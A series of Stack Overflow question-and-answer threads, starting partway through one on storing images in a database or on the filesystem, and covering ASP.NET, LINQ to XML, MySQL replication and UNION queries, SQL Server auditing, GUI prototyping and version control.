For a larger commercial application then I would start to change my thinking. I used to work for a company that developed the county clerks information management application. We would store the images on disk, in an encoded format [to deal with FS problems with large numbers of files] based on the county assigned instrument number. This was useful on another front as the image could exist before the DB record (due to their workflow).
As with most things: 'It depends on what you are doing'
A: Another benefit of storing the images in the file system is that you don't have to do anything special to have the client cache them...
...unless of course the image isn't accessible via the document root (e.g. authentication barrier), in which case you'll need to check the cache-control headers your code is sending.
A: I prefer to store image paths in the DB and images on the filesystem (with rsync between servers to keep everything reasonably current).
However, some of the content-management-system stuff I do needs the images in the CMS for several reasons- visibility control (so the asset is held back until the press release goes out), versioning, reformatting (some CMS's will dynamically resize for thumbnails )and ease of use for linking the images into the WYSIWYG pages.
So the rule of thumb for me is to always stash application stuff on the filesystem, unless it's CMS driven.
A: I would go with the file system approach. No need to create or maintain a DB with images, it will save you some major headaches in the long run.
A: I would go with the file system approach, primarily due to its better flexibility. Consider that if the number of images gets huge, one database may not be able to handle it. With file system, you can simple add more file servers, assuming that you're using NFS or kind.
Another advantage the file system approach has is to be able to do some fancy stuffs, such as you can use Amazon S3 as the primary storage (save the url in the database instead of file path). In case of outages happen to S3, you fall back to your file server (may be another database entry containing the file path). Some voodoo to apply to Apache or whatever web server you're using.
A: Database for data
Filesystem for files
A: I'd almost never store them in the DB. The best approach is usually to store your images in a path controlled by a central configuration variable and name the images according to the DB table and primary key (if possible). This gives you the following advantages:
*
*Move your images to another partition or server just by updating the global config.
*Find the record matching the image by searching on its primary key.
*Your images are accessable to processing tools like imagemagick.
*In web-apps your images can be handled by your webserver directly (saving processing).
*CMS tools and web languages like Coldfusion can handle uploading natively.
A: I have worked with many digital storage systems and they all store digital objects on the file system. They tend to use a branch approach, so there will be an archive tree on the file system, often starting with year of entry e.g. 2009, subdirectory will be month e.g. 8 for August, next directory will be day e.g. 11 and sometimes they will use hour as well, the file will then be named with the records persistent ID. Using BLOBS has its advantages and I have heard of it being used often in the IT parts of the chemical industry for storing thousands or millions of photographs and diagrams. It can provide more granular security, a single method of backup, potentially better data integrity and improved inter media searching, Oracle has many features for this within the package they used to call Intermedia (I think it is called something else now). The file system can also have granular security provided through a system such as XACML or another XML type security object. See D Space of Fedora Object Store for examples.
A: For a large number of small images, the database might be better.
I had an application with many small thumbnails (2Kb each). When I put them on the filesystem, they each consumed 8kb, due to the filesystem's blocksize. A 400% increase in space!
See this post for more information on block size:
What is the block size of the iphone filesystem?
A: If you are on Teradata, then Teradata Developer Exchange has a detailed article on loading and retrieving lobs and blobs..
http://developer.teradata.com/applications/articles/large-objects-part-1-loading
A: I will go for both solution, I mean...I will develop a litle component (EJB) that store the images in a DB plus the path of this image into the server. This DB only will be updated if we have a new image or the original image it's updated. Then I will also store the path in the business DB.
From an application point of view, I will always user the file system (retrieving the path from th business DB) and by this way we will fix the backup issue, and also avoid possible performance issues.
The only weakness is that we will store the same image 2 times...the good point is that the memory is cheap, come on!.
A: I would go with the file system approach. As noted by a few others, most web servers are built to send images from a file path. You'll have much higher performance if you don't have to write or stream out BLOB fields from the database. Having filesystem storage for the images makes it easier to setup static pages when the content isn't changing or you want limit the load on the database.
A: No, due to page splits. You're essentially defining rows that can be 1KB - n MB so your database will have a lot of empty spaces in its pages which is bad for performance.
A: In my current application, I'm doing both. When the user identifies an image to attach to a record, I use ImageMagick to resize it to an appropriate size for display on screen (about 300x300 for my application) and store that in the database for ease of access, but then also copy the user's original file to a network share so that it's available for applications that require higher resolution (like printing).
(There are a couple other factors involved as well: Navision will only display BMPs, so when I resize it I also convert to BMP for storage, and the database is replicated to remote sites where it's useful to be able to display the image. Printing is only done at the head office, so I don't need to replicate the original file.)
A: In my little application I have at least a million files weighing in at about 200GB at last count. All the files are sitting in an XFS file system mounted on a linux server over iscsi. The paths are stored in the database. use some kind of intelligent naming convention for your file paths and file names.
IMHO, use the file system for what it was meant to do - store files. Databases generally do not offer you any advantage over a standard file system in storing binary data.
A: Images on a file store are the best bet, and supplement this with storing the meta data in a database. From a web server perspective, the fast way to serve stuff up is to point to it directly. If it's in the database - ala Sharepoint - you have the overhead of ADO.Net to pull it out, stream it, etc.
Documentum - while bloated and complicated - has it right in that the files are out on the share and available for you to determine how to store them - disk on the server, SAN, NAS, whatever. The Documentum strategy is to store the files a tree structure by encoding the folders and file names according to their primary key in the DB. The DB becomes the resource for knowing what files are what and for enforcing security. For high volume systems this type of approach is a good way to go.
Also consider this when dealing with metadata: should you ever need to update the attributes of your meta data corpus, the DB is your friend as you can quickly perform the updates with SQL. With other tagging systems you do not have the easy data manipulation tools at hand
A: If you are planning a public facing web site then you should not go with either option. Your should use a Content Delivery Network (CDN). There are price, scalability and speed advantages to a CDN when delivering a large amount of static content over the internet.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3748",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "415"
} |
Q: Looking for code to render a form that displays a view of an object I've got the task of displaying a web form to represent the properties in a .NET class. In WinForms, there's a pre-fab control named PropertyGrid that is a lot like what I need. I'm just looking for something to display a simple layout of property names next to an appropriate control like a textbox for strings or a dropdownlist for enum properties.
Does anything like this already exist for ASP.NET, or will I be rolling my own here?
A: ASP.Net PropertyGrid
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3757",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "7"
} |
Q: Prototyping a GUI with a customer When prototyping initial GUI functionality with a customer is it better to use a pen/paper drawing or to mock something up using a tool and show them that ?
The argument against a tool generated design being that the customer can sometimes focus on the low-level specifics of the mock-up rather than taking a higher level functional view of the GUI overall.
A: I would suggest you sit down with your client and use a tool like Mockupscreens and develop the UI interactively. A benefit it has over Napkin LAF is that it does not require coding, or indeed development tools of any kind
A: Check out Balsamiq
It does the "THIS IS NOT A FUNCTIONAL APP" napkin view very well and is easy to use.
Has a full featured demo you can try out online and as an added bonus you can email your XML to your client and they can tweak it and play with it and email it back to you without having to have a license.
A: There is a book called Paper Prototyping which details pen and paper drawing and what you can gain from it. I think it has a lot of benefits, particularly that you can, very early on (and easily), modify what the end result will be without much effort, and then start off on the right foot.
A: A basic paper version is the way to go for an initial mock-up. It's been my experience that if you do a "real" mock-up, even if you explain to the customer that it's a non-functional mock-up, they are confused when things don't work.
Bottom line: keep it as simple as possible. If it's on paper, there is no way the customer will confuse it with a working product.
A: For the first draft, I prefer to use graph paper (the stuff with a grid printed on it) and a pencil. The graph paper is great for helping to maintain proportions. Once the client and I have come to a conclusion I'll usually fill in the drawing with pen since pencil is prone to fading.
When I actually get around to building the digital prototype, I'll scan in the hand-drawn one and use it as a background template. Seems to work pretty well for me.
A: I think it is best to start with Paper/Whiteboards/White walls.
Once you have the basic structure, you can move it to Visio with the wireframe stencils
*
*(Download a Stencil Kit)
*(Visio Stencils for Information Architects).
Or you could use Denim (An Informal Tool For Early Stage Web Site and UI Design) with a tablet PC or Wacom tablets to design the GUI and run it as HTML website.
A: WireframeSketcher is a tool that helps quickly create wireframes, mockups and prototypes for desktop, web and mobile applications. It comes both as a standalone version and as a plug-in for Eclipse IDEs. It has some distinctive features like storyboards, components, linking and vector PDF export. Among supported IDEs are are Aptana, Flash Builder, Zend Studio and Rational Application Developer.
(source: wireframesketcher.com)
A: Always start with paper or paper-like mock-ups first. You do not want to fall into a trap of giving the impression of completeness when the back-end is completely hollow.
A polished prototype or pixel-perfect example puts too much emphasis on the design. With an obvious sketch, you have a better shot of discussing desired functionality and content rather than colors, photos, and other stylistic matters. There will be time for that discussion later in the project.
Jeff discusses paper prototyping in his Coding Horror article UI-First Software Development
Click the "Watch a video!" link at twitter.com to see an interesting take on the idea from Common Craft.
A: The "Napkin Look & Feel" for Java is really cool for prototyping. An actual, functioning, clickable app that looks like it was drawn on a napkin. Check out this screenshot:
Seriously, how cool is that?
A: I've recenly used a windows App to prototype an application to a customer (the final interface has to be integrated into a website).
At first people thought that it would be the last version and they started to make very heavy criticism from the way controls were displayed to the words I had used (terminology and stuff) and the meeting time ended before we could even discuss the functionality itself.
That discussion dragged on for days and days until I told them that, being a mock (and not a final application) all input is welcome but we had to focus on the functionalities first and then we could move on to look and feel as well as terminology issues.
From thay meeting on I am always terrified of prototypes and mock-ups... Perhaps I should just have given them something made in visio instead.
A: You can try out ForeUI, it allow prototyping with different styles, what's more, it can make interactive prototype and run it in browser.
A: For a non-installation browser based tool you can try draft-it
It's free - and if you have a gmail account - no registration is needed.
Makes interactive/Step by Step Or Slide Show- prototypes. You can share your protoype with anyone you choose by just sending a link.
Works for us ...
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3781",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "17"
} |
Q: Is there a WMI Redistributable Package? I've been working on a project that accesses the WMI to get information about the software installed on a user's machine. We've been querying Win32_Product only to find that it doesn't exist in 64-bit versions of Windows because it's an "optional component".
I know there are a lot of really good alternatives to querying the WMI for this information, but I've got a bit of a vested interest in finding out how well this is going to work out.
What I want to know is if there's some kind of redistributable that can be packaged with our software to allow 64-bit users to get the WMI Installer Provider put onto their machines? Right now, they have to install it manually and the installation requires they have their Windows disc handy.
Edit:
You didn't mention for what OS, but the WMI Redistributable Components version 1.0 definitely exists.
For Operation System, we've been using .NET 3.5 so we need packages that will work on XP64 and 64bit versions of Windows Vista.
A: You didn't mention for what OS, but the WMI Redistributable Components version 1.0 definitely exists.
For Windows Server 2003, the WMI SDK and redistributables are part of the Server SDK
I believe that the same is true for the Server 2008 SDK
A: Wouldn't the normal approach for a Windows component be that the administrators of a set of servers use whatever their local software push technology (i.e. SMS) to ensure that component is installed? This is not that uncommon of a requirement for the remote management of servers via WMI.
By the way, the WMI Installer Provider is not provided in the Standard Edition of the server products, but it is in the Enterprise Edition. So, Windows 2003 Server will not have this installed by default, but Windows 2003 Server Enterprise (and DataCenter) will.
This answer does imply that you are putting the burden of installation back on your user base, but for Windows administrators this should not be any issue.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3790",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "4"
} |
Q: Best way to get InnerXml of an XElement? What's the best way to get the contents of the mixed body element in the code below? The element might contain either XHTML or text, but I just want its contents in string form. The XmlElement type has the InnerXml property which is exactly what I'm after.
The code as written almost does what I want, but includes the surrounding <body>...</body> element, which I don't want.
XDocument doc = XDocument.Load(new StreamReader(s));
var templates = from t in doc.Descendants("template")
where t.Attribute("name").Value == templateName
select new
{
Subject = t.Element("subject").Value,
Body = t.Element("body").ToString()
};
A: I think this is a much better method (in VB, shouldn't be hard to translate):
Given an XElement x:
Dim xReader = x.CreateReader
xReader.MoveToContent
xReader.ReadInnerXml
A: I ended up using this:
Body = t.Element("body").Nodes().Aggregate("", (b, node) => b += node.ToString());
A: Personally, I ended up writing an InnerXml extension method using the Aggregate method:
public static string InnerXml(this XElement thiz)
{
return thiz.Nodes().Aggregate( string.Empty, ( element, node ) => element += node.ToString() );
}
My client code is then just as terse as it would be with the old System.Xml namespace:
var innerXml = myXElement.InnerXml();
A: I wanted to see which of these suggested solutions performed best, so I ran some comparative tests. Out of interest, I also compared the LINQ methods to the plain old System.Xml method suggested by Greg. The variation was interesting and not what I expected, with the slowest methods being more than 3 times slower than the fastest.
The results ordered by fastest to slowest:
*
*CreateReader - Instance Hunter (0.113 seconds)
*Plain old System.Xml - Greg Hurlman (0.134 seconds)
*Aggregate with string concatenation - Mike Powell (0.324 seconds)
*StringBuilder - Vin (0.333 seconds)
*String.Join on array - Terry (0.360 seconds)
*String.Concat on array - Marcin Kosieradzki (0.364)
Method
I used a single XML document with 20 identical nodes (called 'hint'):
<hint>
<strong>Thinking of using a fake address?</strong>
<br />
Please don't. If we can't verify your address we might just
have to reject your application.
</hint>
The numbers shown as seconds above are the result of extracting the "inner XML" of the 20 nodes, 1000 times in a row, and taking the average (mean) of 5 runs. I didn't include the time it took to load and parse the XML into an XmlDocument (for the System.Xml method) or XDocument (for all the others).
The LINQ algorithms I used were: (C# - all take an XElement "parent" and return the inner XML string)
CreateReader:
var reader = parent.CreateReader();
reader.MoveToContent();
return reader.ReadInnerXml();
Aggregate with string concatenation:
return parent.Nodes().Aggregate("", (b, node) => b += node.ToString());
StringBuilder:
StringBuilder sb = new StringBuilder();
foreach(var node in parent.Nodes()) {
sb.Append(node.ToString());
}
return sb.ToString();
String.Join on array:
return String.Join("", parent.Nodes().Select(x => x.ToString()).ToArray());
String.Concat on array:
return String.Concat(parent.Nodes().Select(x => x.ToString()).ToArray());
I haven't shown the "Plain old System.Xml" algorithm here as it's just calling .InnerXml on nodes.
Conclusion
If performance is important (e.g. lots of XML, parsed frequently), I'd use Daniel's CreateReader method every time. If you're just doing a few queries, you might want to use Mike's more concise Aggregate method.
If you're using XML on large elements with lots of nodes (maybe 100's), you'd probably start to see the benefit of using StringBuilder over the Aggregate method, but not over CreateReader. I don't think the Join and Concat methods would ever be more efficient in these conditions because of the penalty of converting a large list to a large array (even obvious here with smaller lists).
A: How about using this "extension" method on XElement? worked for me !
public static string InnerXml(this XElement element)
{
StringBuilder innerXml = new StringBuilder();
foreach (XNode node in element.Nodes())
{
// append node's xml string to innerXml
innerXml.Append(node.ToString());
}
return innerXml.ToString();
}
OR use a little bit of Linq
public static string InnerXml(this XElement element)
{
StringBuilder innerXml = new StringBuilder();
doc.Nodes().ToList().ForEach( node => innerXml.Append(node.ToString()));
return innerXml.ToString();
}
Note: The code above has to use element.Nodes() as opposed to element.Elements(). Very important thing to remember the difference between the two. element.Nodes() gives you everything like XText, XAttribute etc, but XElement only an Element.
A: @Greg: It appears you've edited your answer to be a completely different answer. To which my answer is yes, I could do this using System.Xml but was hoping to get my feet wet with LINQ to XML.
I'll leave my original reply below in case anyone else wonders why I can't just use the XElement's .Value property to get what I need:
@Greg: The Value property concatenates all the text contents of any child nodes. So if the body element contains only text it works, but if it contains XHTML I get all the text concatenated together but none of the tags.
A: With all due credit to those who discovered and proved the best approach (thanks!), here it is wrapped up in an extension method:
public static string InnerXml(this XNode node) {
using (var reader = node.CreateReader()) {
reader.MoveToContent();
return reader.ReadInnerXml();
}
}
A: Keep it simple and efficient:
String.Concat(node.Nodes().Select(x => x.ToString()).ToArray())
*
*Aggregate is memory and performance inefficient when concatenating strings
*Using Join("", sth) is using two times bigger string array than Concat... And looks quite strange in code.
*Using += looks very odd, but apparently is not much worse than using '+' - probably would be optimized to the same code, becase assignment result is unused and might be safely removed by compiler.
*StringBuilder is so imperative - and everybody knows that unnecessary "state" sucks.
A: // using Regex might be faster to simply trim the begin and end element tag
var content = element.ToString();
var matchBegin = Regex.Match(content, @"<.+?>");
content = content.Substring(matchBegin.Index + matchBegin.Length);
var matchEnd = Regex.Match(content, @"</.+?>", RegexOptions.RightToLeft);
content = content.Substring(0, matchEnd.Index);
A: doc.ToString() or doc.ToString(SaveOptions) does the work.
See http://msdn.microsoft.com/en-us/library/system.xml.linq.xelement.tostring(v=vs.110).aspx
A: Is it possible to use the System.Xml namespace objects to get the job done here instead of using LINQ? As you already mentioned, XmlNode.InnerXml is exactly what you need.
A: Wondering if (notice I got rid of the b+= and just have b+)
t.Element( "body" ).Nodes()
.Aggregate( "", ( b, node ) => b + node.ToString() );
might be slightly less efficient than
string.Join( "", t.Element.Nodes()
.Select( n => n.ToString() ).ToArray() );
Not 100% sure...but glancing at Aggregate() and string.Join() in Reflector...I think I read it as Aggregate just appending a returning value, so essentially you get:
string = string + string
versus string.Join, it has some mention in there of FastStringAllocation or something, which makes me thing the folks at Microsoft might have put some extra performance boost in there. Of course my .ToArray() call my negate that, but I just wanted to offer up another suggestion.
A: you know? the best thing to do is to back to CDATA :( im looking at solutions here but i think CDATA is by far the simplest and cheapest, not the most convenient to develop with tho
A: var innerXmlAsText= XElement.Parse(xmlContent)
.Descendants()
.Where(n => n.Name.LocalName == "template")
.Elements()
.Single()
.ToString();
Will do the job for you
A: public static string InnerXml(this XElement xElement)
{
//remove start tag
string innerXml = xElement.ToString().Trim().Replace(string.Format("<{0}>", xElement.Name), "");
////remove end tag
innerXml = innerXml.Trim().Replace(string.Format("</{0}>", xElement.Name), "");
return innerXml.Trim();
}
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3793",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "153"
} |
Q: Full complete MySQL database replication? Ideas? What do people do? Currently I have two Linux servers running MySQL, one sitting on a rack right next to me under a 10 Mbit/s upload pipe (main server) and another some couple of miles away on a 3 Mbit/s upload pipe (mirror).
I want to be able to replicate data on both servers continuously, but have run into several roadblocks. One of them being, under MySQL master/slave configurations, every now and then, some statements drop (!), meaning; some people logging on to the mirror URL don't see data that I know is on the main server and vice versa. Let's say this happens on a meaningful block of data once every month, so I can live with it and assume it's a "lost packet" issue (i.e., god knows, but we'll compensate).
The other most important (and annoying) recurring issue is that, when for some reason we do a major upload or update (or reboot) on one end and have to sever the link, then LOAD DATA FROM MASTER doesn't work and I have to manually dump on one end and upload on the other, quite a task nowadays moving some .5 TB worth of data.
Is there software for this? I know MySQL (the "corporation") offers this as a VERY expensive service (full database replication). What do people out there do? The way it's structured, we run an automatic failover where if one server is not up, then the main URL just resolves to the other server.
A: We at Percona offer free tools to detect discrepancies between master and server, and to get them back in sync by re-applying minimal changes.
*
*pt-table-checksum
*pt-table-sync
A: GoldenGate is a very good solution, but probably as expensive as the MySQL replicator.
It basically tails the journal, and applies changes based on what's committed. They support bi-directional replication (a hard task), and replication between heterogenous systems.
Since they work by processing the journal file, they can do large-scale distributed replication without affecting performance on the source machine(s).
A: I have never seen dropped statements but there is a bug where network problems could cause relay log corruption. Make sure you dont run mysql without this fix.
Documented in the 5.0.56, 5.1.24, and 6.0.5 changelogs as follows:
Network timeouts between the master and the slave could result
in corruption of the relay log.
http://bugs.mysql.com/bug.php?id=26489
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3798",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "20"
} |
Q: More vs. Faster Cores on a Webserver The discussion of Dual vs. Quadcore is as old as the Quadcores itself and the answer is usually "it depends on your scenario". So here the scenario is a Web Server (Windows 2003 (not sure if x32 or x64), 4 GB RAM, IIS, ASP.net 3.0).
My impression is that the CPU in a Webserver does not need to be THAT fast because requests are usually rather lightweight, so having more (slower) cores should be a better choice as we got many small requests.
But since I do not have much experience with IIS load balancing and since I don't want to spend a lot of money only to find out I've made the wrong choice, can someone who has a bit more experience comment on whether or not More Slower or Fewer Faster cores is better?
A: We use apache on linux, which forks a process to handle requests. We've found that more cores help our throughput, since they reduce the latency of processes waiting to be placed on the run queue. I don't have much experience with IIS, but I imagine the same scenario applies with its thread pool.
A: Mark Harrison said:
I don't have much experience with IIS, but I imagine the same scenario applies with its thread pool.
Indeed - more cores = more threads running concurrently. IIS is inherently multithreaded, and takes easy advantage of this.
A: For something like a webserver, dividing up the tasks of handling each connection is (relatively) easy. I say it's safe to say that web servers is one of the most common (and ironed out) uses of parallel code. And since you are able to split up much of the processing into multiple discrete threads, more cores actually does benefit you. This is one of the big reasons why shared hosting is even possible. If server software like IIS and Apache couldn't run requests in parallel it would mean that every page request would have to be dished out in a queue fashion...likely making load times unbearably slow.
This also why high end server Operating Systems like Windows 2008 Server Enterprise support something like 64 cores and 2TB of RAM. These are applications that can actually take advantage of that many cores.
Also, since each request is likely has low CPU load, you can probably (for some applications) get away with more slower cores. But obviously having each core faster can mean being able to get each task done quicker and, in theory, handle more tasks and more server requests.
A: The more the better. As programming languages start to become more complex and abstract, the more processing power that will be required.
Atleat Jeff believes Quadcore is better.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3801",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "11"
} |
Q: How do you typeset code elements in normal text? What is the best way to typeset a function with arguments for readibility, brevity, and accuracy? I tend to put empty parentheses after the function name like func(), even if there are actually arguments for the function. I have trouble including the arguments and still feeling like the paragraph is readable.
Any thoughts on best practices for this?
A: I usually take that approach, but if I feel like it's going to cause confusion, I'll use ellipses like: myFunction(...)
I guess if I were good, I would use those any time I was omitting parameters from a function in text.
A: I would simply be a little more careful with the name of my variables and parameters, most people will then be able to guess much more accurately what type of data you want to hold in it.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3802",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "8"
} |
Q: Setup Visual Studio 2005 to print line numbers How can I get line numbers to print in Visual Studio 2005 when printing code listings?
A: Isn't there an option in the Print Dialog?
Edit: There is. Go to File => Print, and then in the bottom left there is "Print what" and then "Include line Numbers"
A: There is an option in the Print Dialog to do the same (in VS 2005 and 2008 atleast)!
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3809",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "11"
} |
Q: Suggestions for implementing audit tables in SQL Server? One simple method I've used in the past is basically just creating a second table whose structure mirrors the one I want to audit, and then create an update/delete trigger on the main table. Before a record is updated/deleted, the current state is saved to the audit table via the trigger.
While effective, the data in the audit table is not the most useful or simple to report off of. I'm wondering if anyone has a better method for auditing data changes?
There shouldn't be too many updates of these records, but it is highly sensitive information, so it is important to the customer that all changes are audited and easily reported on.
A: We are using two table design for this.
One table is holding data about transaction (database, table name, schema, column, application that triggered transaction, host name for login that started transaction, date, number of affected rows and couple more).
Second table is only used to store data changes so that we can undo changes if needed and report on old/new values.
Another option is to use a third party tool for this such as ApexSQL Audit or Change Data Capture feature in SQL Server.
A: I have found these two links useful:
Using CLR and single audit table.
Creating a generic audit trigger with SQL 2005 CLR
Using triggers and separate audit table for each table being audited.
How do I audit changes to SQL Server data?
A: How much writing vs. reading of this table(s) do you expect?
I've used a single audit table, with columns for Table, Column, OldValue, NewValue, User, and ChangeDateTime - generic enough to work with any other changes in the DB, and while a LOT of data got written to that table, reports on that data were sparse enough that they could be run at low-use periods of the day.
Added:
If the amount of data vs. reporting is a concern, the audit table could be replicated to a read-only database server, allowing you to run reports whenever necessary without bogging down the master server from doing their work.
A: Are there any built-in audit packages? Oracle has a nice package, which will even send audit changes off to a separate server outside the access of any bad guy who is modifying the SQL.
Their example is awesome... it shows how to alert on anybody modifying the audit tables.
A: OmniAudit might be a good solution for you need. I've never used it before because I'm quite happy writing my own audit routines, but it sounds good.
A: I use the approach described by Greg in his answer and populate the audit table with a stored procedure called from the table triggers.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3823",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "32"
} |
Q: How do I best detect an ASP.NET expired session? I need to detect when a session has expired in my Visuial Basic web application. This is what I'm using...
Protected Sub Page_Load(ByVal sender As Object, ByVal e As System.EventArgs) Handles Me.Load
If CurrentSession.IsNew AndAlso (Not Page.Request.Headers("Cookie") Is Nothing) AndAlso (Page.Request.Headers("Cookie").IndexOf("ASP.NET_SessionId") >= 0) Then
Response.Redirect("TimeOut.aspx")
End If
...do something...
End Sub
Note: CurrentSession.IsNew returns HttpContext.Current.Session.IsNewSession
This seems to work well for Internet Explorer, but seems to fail with Firefox.
A: Try the following
If Session("whatever") IsNot Nothing Then
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3831",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "12"
} |
Q: How do I Concatenate entire result sets in MySQL? I'm trying out the following query:
SELECT A,B,C FROM table WHERE field LIKE 'query%'
UNION
SELECT A,B,C FROM table WHERE field LIKE '%query'
UNION
SELECT A,B,C FROM table WHERE field LIKE '%query%'
GROUP BY B ORDER BY B ASC LIMIT 5
That's three queries stuck together, kinda sorta. However, the result set that comes back reflects results from query #3 before the results from query #1 which is undesired.
Is there any way to prioritize these so that results come as all for query #1, then all for query #2 then all for query #3? I don't want to do this in PHP just yet (not to mention having to control for results that showed up in the first query not to show in the second and so forth).
A: Add an additional column with hard-coded values that you will use to sort the overall resultset, like so:
SELECT A,B,C,1 as [order] FROM table WHERE field LIKE 'query%'
UNION
SELECT A,B,C,2 as [order] FROM table WHERE field LIKE '%query'
UNION
SELECT A,B,C,3 as [order] FROM table WHERE field LIKE '%query%'
GROUP BY B ORDER BY [order] ASC, B ASC LIMIT 5
A: Can you do it as a subselect, something like
SELECT * FROM (
SELECT A,B,C FROM table WHERE field LIKE 'query%'
UNION
SELECT A,B,C FROM table WHERE field LIKE '%query'
UNION
SELECT A,B,C FROM table WHERE field LIKE '%query%'
) ORDER BY B ASC LIMIT 5
A: Maybe you should try including a fourth column, stating the table it came from, and then order and group by it:
SELECT A,B,C, "query 1" as origin FROM table WHERE field LIKE 'query%'
UNION
SELECT A,B,C, "query 2" as origin FROM table WHERE field LIKE '%query'
UNION
SELECT A,B,C, "query 3" as origin FROM table WHERE field LIKE '%query%'
GROUP BY origin, B ORDER BY origin, B ASC LIMIT 5
A: SELECT distinct a,b,c FROM (
SELECT A,B,C,1 as o FROM table WHERE field LIKE 'query%'
UNION
SELECT A,B,C,2 as o FROM table WHERE field LIKE '%query'
UNION
SELECT A,B,C,3 as o FROM table WHERE field LIKE '%query%'
)
ORDER BY o ASC LIMIT 5
Would be my way of doing it. I dont know how that scales.
I don't understand the
GROUP BY B ORDER BY B ASC LIMIT 5
Does it apply only to the last SELECT in the union?
Does mysql actually allow you to group by a column and still not do aggregates on the other columns?
EDIT: aaahh. I see that mysql actually does. Its a special version of DISTINCT(b) or something. I wouldnt want to try to be an expert on that area :)
A: If there isn't a sort that makes sense to order them you desire, don't union the results together - just return 3 separate recordsets, and deal with them accordingly in your data tier.
A: I eventually (looking at all suggestions) came to this solution, its a bit of a compromise between what I need and time.
SELECT * FROM
(SELECT A, B, C, "1" FROM table WHERE B LIKE 'query%' LIMIT 3
UNION
SELECT A, B, C, "2" FROM table WHERE B LIKE '%query%' LIMIT 5)
AS RS
GROUP BY B
ORDER BY 1 DESC
it delivers 5 results total, sorts from the fourth "column" and gives me what I need; a natural result set (its coming over AJAX), and a wildcard result set following right after.
:)
/mp
A: There are two varients of UNION.
'UNION' and 'UNION ALL'
In most cases what you really want to say is UNION ALL as it does not do duplicate elimination (Think SELECT DISTINCT) between sets which can result in quite a bit of savings in terms of execution time.
Others have suggested multiple result sets which is a workable solution however I would caution against this in time sensitive applications or applications connected over WANs as doing so can result in significantly more round trips on the wire between server and client.
A: I don't understand why the need of union for taking the data from single table
SELECT A, B, C
FROM table
WHERE field LIKE 'query%'
OR field LIKE '%query'
OR field LIKE '%query%'
GROUP BY B
ORDER BY B ASC LIMIT 5
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3839",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "21"
} |
Q: Adobe Flex component events I wrote a component that displays a filename, a thumbnail and has a button to load/play the file. The component is databound to a repeater. How can I make it so that the button event fires to the main application and tells it which file to play?
A: Figured it out (finally)
Custom Component
<?xml version="1.0" encoding="utf-8"?>
<mx:Canvas xmlns:mx="http://www.adobe.com/2006/mxml" x="0" y="0" width="215" height="102" styleName="leftListItemPanel" backgroundColor="#ECECEC" horizontalScrollPolicy="off" verticalScrollPolicy="off">
<mx:Script>
<![CDATA[
[Bindable] public var Title:String = "";
[Bindable] public var Description:String = "";
[Bindable] public var Icon:String = "";
[Bindable] public var FileID:String = "";
private function viewClickHandler():void{
dispatchEvent(new Event("viewClick", true));// bubble to parent
}
]]>
</mx:Script>
<mx:Metadata>
[Event(name="viewClick", type="flash.events.Event")]
</mx:Metadata>
<mx:Label x="11" y="9" text="{String(Title)}" styleName="listItemLabel"/>
<mx:TextArea x="11" y="25" height="36" width="170" backgroundAlpha="0.0" alpha="0.0" styleName="listItemDesc" wordWrap="true" editable="false" text="{String(Description)}"/>
<mx:Button x="20" y="65" label="View" click="viewClickHandler();" styleName="listItemButton" height="22" width="60"/>
<mx:LinkButton x="106" y="68" label="Details..." styleName="listItemLink" height="18"/>
<mx:HRule x="0" y="101" width="215"/>
The Repeater
<mx:Canvas id="pnlSpotlight" label="SPOTLIGHT" height="100%" width="100%" horizontalScrollPolicy="off">
<mx:VBox width="100%" height="80%" paddingTop="2" paddingBottom="1" verticalGap="1">
<mx:Repeater id="rptrSpotlight" dataProvider="{aSpotlight}">
<sm:SmallCourseListItem
viewClick="PlayFile(event.currentTarget.getRepeaterItem().fileName);"
Description="{rptrSpotlight.currentItem.fileDescription}"
FileID = "{rptrRecentlyViewed.currentItem.fileName}"
Title="{rptrSpotlight.currentItem.fileTitle}" />
</mx:Repeater>
</mx:VBox>
</mx:Canvas>
Handling function
private function PlayFile(fileName:String):void{
Alert.show(fileName.toString());
}
A: On your custom component you can listen to the button click event and then generate a custom event that holds information about the file you want to play. You can then set the bubbles property to true on the event and dispatch the custom event from your custom component. The bubbles property will make your event float up the display list and reach your main application. Now on your main application you can listen to that event and play the correct file. Hope this helps.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3856",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "7"
} |
Q: What is the difference between all the different types of version control? After being told by at least 10 people on SO that version control was a good thing even if it's just me I now have a followup question.
What is the difference between all the different types of version control and is there a guide that anybody knows of for version control that's very simple and easy to understand?
A: To everyone just starting using version control:
Please do not use git (or hg or bzr) because of the hype
Use git (or hg or bzr) because they are better tools for managing source code than SVN.
I used SVN for a few years at work, and switched over to git 6 months ago. Without learning SVN first I would be totaly lost when it comes to using a DVCS.
For people just starting out with version control:
*
*Start by downloading SVN
*Learn why you need version control
*Learn how to commit, checkout, branch
*Learn why merging in SVN is such a pain
Then switch over to a DVCS and learn:
*
*How to clone/branch/commit
*How easy it is to merge your branches back (go branch crazy!)
*How easy it is to rewrite commit history and keep your branchesup to date with the main line (git rebase -i, )
*How to publish your changes so others can benefit
tldr; crowd:
